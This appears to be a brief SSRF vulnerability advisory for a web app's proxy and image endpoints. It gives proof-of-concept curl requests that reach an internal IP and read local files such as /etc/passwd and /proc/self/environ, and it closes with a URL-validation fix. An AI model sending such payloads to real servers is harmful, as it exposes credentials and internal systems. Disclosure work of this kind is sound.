### Key Information #### Vulnerability Type - SSRF (Server-Side Request Forgery) #### Impact - Read cloud metadata to obtain credentials and take over cloud infrastructure. - Access internal systems. - Read local information. #### POC (Proof of Concept) 1. **Request** ```bash curl "http://localhost:8080/api/proxy?url=http://172.31.0.1:9696/methods/FLGTEntity-subreader_12-test10&method=POST" ``` **Response** ```json { "status": "success", "data": { "result": "..." } } ``` 2. **Request** ```bash curl "http://localhost:8080/api/image?url=https://example.com" ``` **Response** ```json { "status": "success", "data": { "image": "..." } } ``` 3. **File Access Example** ```bash bun -version v2.0.0 cat app.js const res = await fetch('file:///etc/passwd'); if (!res.ok) throw new Error(`HTTP error: ${res.status}`); const html = await res.text(); console.log(html); ``` 4. **Other Request and Response Examples** ```bash curl "http://localhost:8080/api/proxy?url=file:///proc/self/environ&method=POST" ``` #### Recommendation - Before calling `fetch`, add a filter to validate whether the requested URL is legitimate, and disable file protocol access to local files (ensure the URL field starts with http or https; otherwise, discard the request).